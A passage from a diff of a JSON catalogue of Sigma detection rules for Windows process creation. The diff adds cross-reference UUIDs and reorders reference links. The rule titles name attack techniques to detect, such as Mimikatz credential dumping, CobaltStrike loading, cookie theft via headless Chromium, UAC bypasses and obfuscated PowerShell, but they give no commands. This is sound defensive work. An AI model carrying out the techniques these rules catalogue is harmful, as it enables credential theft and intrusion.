"https://www.joesandbox.com/analysis/411752/0/html#7048BB9A06B8F2DD9D24C77F389D7B2B58D2", "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html", + "https://www.joesandbox.com/analysis/411752/0/html#7048BB9A06B8F2DD9D24C77F389D7B2B58D2", + "https://app.any.run/tasks/8b9a571b-bcc1-4783-ba32-df4ba623b9c0/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_darkside_ransomware.yml" ], "tags": [ @@ -43691,6 +56160,15 @@ "attack.t1204" ] }, + "related": [ + { + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "965fff6c-1d7e-4e25-91fd-cdccd75f7d2c", "value": "DarkSide Ransomware Pattern" }, @@ -43760,6 +56238,15 @@ "attack.execution" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6004abd0-afa4-4557-ba90-49d172e0a299", "value": "Execute Pcwrun.EXE To Leverage Follina" }, @@ -43784,6 +56271,15 @@ "attack.t1127" ] }, + "related": [ + { + "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a9e416a8-e613-4f8b-88b8-a7d1d1af2f61", "value": "Suspicious Use of CSharp Interactive Console" }, @@ -43800,8 +56296,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://attack.mitre.org/software/S0246/ (Lazarus HARDRAIN)", "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf", + "https://attack.mitre.org/software/S0246/ (Lazarus HARDRAIN)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_add.yml" ], "tags": [ @@ -43809,6 +56305,15 @@ "attack.t1562.004" ] }, + "related": [ + { + "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c", "value": "Netsh Port or Application Allowed" }, @@ -43834,6 +56339,15 @@ "attack.t1218.011" ] }, + "related": [ + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "73fcad2e-ff14-4c38-b11d-4172c8ac86c7", "value": "Suspicious Rundll32 Script in CommandLine" }, @@ -43883,6 +56397,15 @@ "attack.t1552.006" ] }, + "related": [ + { + "dest-uuid": "8d7bd4f5-3a89-4453-9c82-2c8894d5655e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "47e4bab7-c626-47dc-967b-255608c9a920", "value": "Suspicious Recon Activity Using Findstr Keywords" }, @@ -43900,9 +56423,9 @@ "logsource.product": "windows", "refs": [ "https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/", - "https://twitter.com/Cyb3rWard0g/status/1453123054243024897", "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", "https://github.com/antonioCoco/RogueWinRM", + "https://twitter.com/Cyb3rWard0g/status/1453123054243024897", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_child_process_as_system_.yml" ], "tags": [ @@ -43910,6 +56433,15 @@ "attack.t1134.002" ] }, + "related": [ + { + "dest-uuid": "677569f9-a8b0-459e-ab24-7f18091fa7bf", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "590a5f4c-6c8c-4f10-8307-89afe9453a9d", "value": "Suspicious Child Process Created as System" }, @@ -43926,11 +56458,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://community.sophos.com/b/security-blog/posts/active-ransomware-attack-on-kaseya-customers", - "https://www.joesandbox.com/analysis/443736/0/html", "https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/", + "https://community.sophos.com/b/security-blog/posts/active-ransomware-attack-on-kaseya-customers", "https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/", "https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b", + "https://www.joesandbox.com/analysis/443736/0/html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_revil_kaseya.yml" ], "tags": [ @@ -43939,6 +56471,15 @@ "attack.g0115" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5de632bc-7fbd-4c8a-944a-fce55c59eae5", "value": "REvil Kaseya Incident Malware Patterns" }, @@ -43955,8 +56496,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/Yasser_Elsnbary/status/1553804135354564608", "https://h.43z.one/ipconverter/", + "https://twitter.com/Yasser_Elsnbary/status/1553804135354564608", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_obfuscated_ip_download.yml" ], "tags": [ @@ -43989,6 +56530,15 @@ "attack.t1218.011" ] }, + "related": [ + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ae9c6a7c-9521-42a6-915e-5aaa8689d529", "value": "CobaltStrike Load by Rundll32" }, @@ -44039,7 +56589,7 @@ "value": "Network Sniffing" }, { - "description": "Detects a suspicious parents of powershell.exe", + "description": "Detects a suspicious parents of powershell.exe process", "meta": { "author": "Teymur Kheirkhabarov, Harish Segar (rule)", "creation_date": "2020/03/20", @@ -44059,6 +56609,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "754ed792-634f-40ae-b3bc-e0448d33f695", "value": "Suspicious PowerShell Parent Process" }, @@ -44075,8 +56634,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://pentestlab.blog/2020/02/24/parent-pid-spoofing/", "https://www.virustotal.com/gui/search/filename%253A*spoof*%2520filename%253A*ppid*/files", + "https://pentestlab.blog/2020/02/24/parent-pid-spoofing/", "https://www.picussecurity.com/resource/blog/how-to-detect-parent-pid-ppid-spoofing-attacks", "https://www.ired.team/offensive-security/defense-evasion/parent-process-id-ppid-spoofing", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_selectmyparent.yml" @@ -44086,6 +56645,15 @@ "attack.t1134.004" ] }, + "related": [ + { + "dest-uuid": "93591901-3172-4e94-abf8-6034ab26f44a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "52ff7941-8211-46f9-84f8-9903efb7077d", "value": "PPID Spoofing Tool Usage" }, @@ -44102,9 +56670,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", "https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3", "https://twitter.com/splinter_code/status/1483815103279603714", + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_advancedrun_priv_user.yml" ], @@ -44126,9 +56694,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd", "https://docs.microsoft.com/en-us/azure/dns/dns-zones-records", "https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dnscmd_discovery.yml" ], "tags": [ @@ -44161,6 +56729,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "129966c9-de17-4334-a123-8b58172e664d", "value": "Suspicious Dump64.exe Execution" }, @@ -44188,6 +56765,22 @@ "attack.t1202" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f37aba28-a9e6-4045-882c-d5004043b337", "value": "Suspicious Cmdl32 Execution" }, @@ -44204,8 +56797,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://unit42.paloaltonetworks.com/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-20---powershell-invoke-known-malicious-cmdlets", + "https://unit42.paloaltonetworks.com/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/", "https://mikefrobbins.com/2017/06/15/simple-obfuscation-with-powershell-using-base64-encoding/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_encode.yml" ], @@ -44214,6 +56807,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fb843269-508c-4b76-8b8d-88679db22ce7", "value": "Suspicious Execution of Powershell with Base64" }, @@ -44238,6 +56840,15 @@ "attack.t1219" ] }, + "related": [ + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b52e84a3-029e-4529-b09b-71d19dd27e94", "value": "Use of Anydesk Remote Access Software" }, @@ -44254,8 +56865,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Atbroker/", "http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/", + "https://lolbas-project.github.io/lolbas/Binaries/Atbroker/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_atbroker.yml" ], "tags": [ @@ -44263,6 +56874,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f24bcaea-0cd1-11eb-adc1-0242ac120002", "value": "Suspicious Atbroker Execution" }, @@ -44289,6 +56909,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4bf943c6-5146-4273-98dd-e958fd1e3abf", "value": "Invoke-Obfuscation Obfuscated IEX Invocation" }, @@ -44305,9 +56934,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Rasautou/", "https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html", "https://github.com/fireeye/DueDLLigence", - "https://lolbas-project.github.io/lolbas/Binaries/Rasautou/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_rasautou_dll_execution.yml" ], "tags": [ @@ -44315,6 +56944,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cd3d1298-eb3b-476c-ac67-12847de55813", "value": "DLL Execution via Rasautou.exe" }, @@ -44339,6 +56977,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "30e92f50-bb5a-4884-98b5-d20aa80f3d7a", "value": "Hidden Powershell in Link File Pattern" }, @@ -44355,9 +57002,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1", "https://github.com/tevora-threat/SharpView/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-4---system-discovery-using-sharpview", + "https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sharpview.yml" ], "tags": [ @@ -44369,6 +57016,29 @@ "attack.t1033" ] }, + "related": [ + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "2aed01ad-3df3-4410-a8cb-11ea4ded587c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b2317cfa-4a47-4ead-b3ff-297438c0bc2d", "value": "Suspicious Execution of SharpView Aka PowerView" }, @@ -44420,6 +57090,15 @@ "attack.t1202" ] }, + "related": [ + { + "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3037d961-21e9-4732-b27a-637bcc7bf539", "value": "Suspicious High IntegrityLevel Conhost Legacy Option" }, @@ -44471,6 +57150,22 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b66474aa-bd92-4333-a16c-298155b120df", "value": "Suspicious Powershell No File or Command" }, @@ -44497,6 +57192,15 @@ "attack.s0108" ] }, + "related": [ + { + "dest-uuid": "f63fe421-b1d1-45c0-b8a7-02cd16ff2bed", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "56321594-9087-49d9-bf10-524fe8479452", "value": "Suspicious Netsh DLL Persistence" }, @@ -44550,6 +57254,43 @@ "attack.t1003.006" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1ecfdab8-7d59-4c98-95d4-dc41970f57fc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "6add2ab5-2711-4e9d-87c8-7a0be8531530", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f303a39a-6255-4b89-aecc-18c4d8ca7163", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a642964e-bead-4bed-8910-1bb4d63e3b4d", "value": "Mimikatz Command Line" }, @@ -44575,6 +57316,15 @@ "attack.t1485" ] }, + "related": [ + { + "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c1d867fe-8d95-4487-aab4-e53f2d339f90", "value": "Renamed Sysinternals Sdelete Usage" }, @@ -44591,8 +57341,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/cglyer/status/1183756892952248325", "https://docs.microsoft.com/en-us/windows/win32/intl/code-page-identifiers", + "https://twitter.com/cglyer/status/1183756892952248325", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_codepage_switch.yml" ], "tags": [ @@ -44616,10 +57366,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://embracethered.com/blog/posts/2020/cookie-crimes-on-mirosoft-edge/", + "https://embracethered.com/blog/posts/2020/chrome-spy-remote-control/", "https://github.com/defaultnamehere/cookie_crimes/", "https://mango.pdf.zone/stealing-chrome-cookies-without-a-password", - "https://embracethered.com/blog/posts/2020/chrome-spy-remote-control/", + "https://embracethered.com/blog/posts/2020/cookie-crimes-on-mirosoft-edge/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_chromium_headless_debugging.yml" ], "tags": [ @@ -44627,11 +57377,20 @@ "attack.t1185" ] }, + "related": [ + { + "dest-uuid": "544b0346-29ad-41e1-a808-501bb4193f47", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3e8207c5-fcd2-4ea6-9418-15d45b4890e4", "value": "Potential Data Stealing Via Chromium Headless Debugging" }, { - "description": "Detects suspicious ways to run Invoke-Execution using IEX acronym", + "description": "Detects suspicious ways to run Invoke-Execution using IEX alias", "meta": { "author": "Florian Roth", "creation_date": "2022/03/24", @@ -44672,6 +57431,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6c6d9280-e6d0-4b9d-80ac-254701b64916", "value": "NTLM Coercion Via Certutil.exe" }, @@ -44740,8 +57508,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://cyber.wtf/2021/11/15/guess-whos-back/", "https://paste.cryptolaemus.com/emotet/2020/12/22/emotet-malware-IoCs_12-22-20.html", + "https://cyber.wtf/2021/11/15/guess-whos-back/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_emotet_rundll32_execution.yml" ], "tags": [ @@ -44749,6 +57517,15 @@ "attack.t1218.011" ] }, + "related": [ + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "54e57ce3-0672-46eb-a402-2c0948d5e3e9", "value": "Emotet RunDLL32 Process Creation" }, @@ -44789,8 +57566,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://threathunterplaybook.com/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.html", "https://github.com/OTRF/detection-hackathon-apt29/issues/6", + "https://threathunterplaybook.com/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdclt_child_process.yml" ], "tags": [ @@ -44798,6 +57575,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "da2738f2-fadb-4394-afa7-0a0674885afa", "value": "Sdclt Child Processes" }, @@ -44838,9 +57624,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/neonprimetime/status/1435584010202255375", - "https://www.joesandbox.com/analysis/476188/1/iochtml", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444", + "https://www.joesandbox.com/analysis/476188/1/iochtml", + "https://twitter.com/neonprimetime/status/1435584010202255375", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_control_cve_2021_40444.yml" ], "tags": [ @@ -44848,6 +57634,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "894397c6-da03-425c-a589-3d09e7d1f750", "value": "CVE-2021-40444 Process Pattern" }, @@ -44864,8 +57659,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.hvs-consulting.de/lazarus-report/", "https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/", + "https://www.hvs-consulting.de/lazarus-report/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_lazarus_activity_dec20.yml" ], "tags": [ @@ -44874,6 +57669,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "24c4d154-05a4-4b99-b57d-9b977472443a", "value": "Lazarus Activity Dec20" }, @@ -44890,8 +57694,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf", "https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution", + "https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_gamaredon_ultravnc.yml" ], "tags": [ @@ -44926,6 +57730,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "242301bc-f92f-4476-8718-78004a6efd9f", "value": "Suspicious Load DLL via CertOC.exe" }, @@ -44951,6 +57764,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1ca6bd18-0ba0-44ca-851c-92ed89a61085", "value": "UAC Bypass Using Consent and Comctl32 - Process" }, @@ -44967,8 +57789,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/", "https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/", + "https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ie4uinit.yml" ], "tags": [ @@ -44976,6 +57798,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d3bf399f-b0cf-4250-8bb4-dfc192ab81dc", "value": "Ie4uinit Lolbin Use From Invalid Path" }, @@ -44992,8 +57823,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/", "https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100", + "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysmon_uac_bypass_eventvwr.yml" ], "tags": [ @@ -45003,6 +57834,15 @@ "car.2019-04-001" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "be344333-921d-4c4d-8bb8-e584cf584780", "value": "UAC Bypass via Event Viewer" }, @@ -45052,6 +57892,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7eedcc9d-9fdb-4d94-9c54-474e8affc0c7", "value": "Invoke-Obfuscation COMPRESS OBFUSCATION" }, @@ -45068,8 +57917,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_export_keys.yml" ], "tags": [ @@ -45102,6 +57951,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "459f2f98-397b-4a4a-9f47-6a5ec2f1c69d", "value": "Download Arbitrary Files Via MSOHTMED.EXE" }, @@ -45129,6 +57987,22 @@ "attack.t1566.001" ] }, + "related": [ + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "864403a1-36c9-40a2-a982-4c9a45f7d833", "value": "Exploit for CVE-2017-0261" }, @@ -45145,7 +58019,7 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://attack.mitre.org/techniques/T1037/", + "https://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_logon_scripts_userinitmprlogonscript_proc.yml" ], "tags": [ @@ -45153,6 +58027,15 @@ "attack.persistence" ] }, + "related": [ + { + "dest-uuid": "eb125d40-0b2d-41ac-a71a-3229241c2cd3", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0a98a10c-685d-4ab0-bddc-b6bdd1d48458", "value": "Logon Scripts (UserInitMprLogonScript)" }, @@ -45177,6 +58060,15 @@ "attack.t1047" ] }, + "related": [ + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d21374ff-f574-44a7-9998-4a8c8bf33d7d", "value": "Wmiprvse Spawning Process" }, @@ -45202,6 +58094,15 @@ "attack.t1003" ] }, + "related": [ + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "baef1ec6-2ca9-47a3-97cc-4cf2bda10b77", "value": "New Network Provider - CommandLine" }, @@ -45227,6 +58128,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f35c5d71-b489-4e22-a115-f003df287317", "value": "CobaltStrike Process Patterns" }, @@ -45253,6 +58163,15 @@ "attack.execution" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "af77cf95-c469-471c-b6a0-946c685c4798", "value": "Proxy Execution via Wuauclt" }, @@ -45270,7 +58189,6 @@ "logsource.product": "windows", "refs": [ "https://github.com/vanhauser-thc/thc-hydra", - "https://attack.mitre.org/techniques/T1110/001/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_hydra.yml" ], "tags": [ @@ -45295,8 +58213,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - 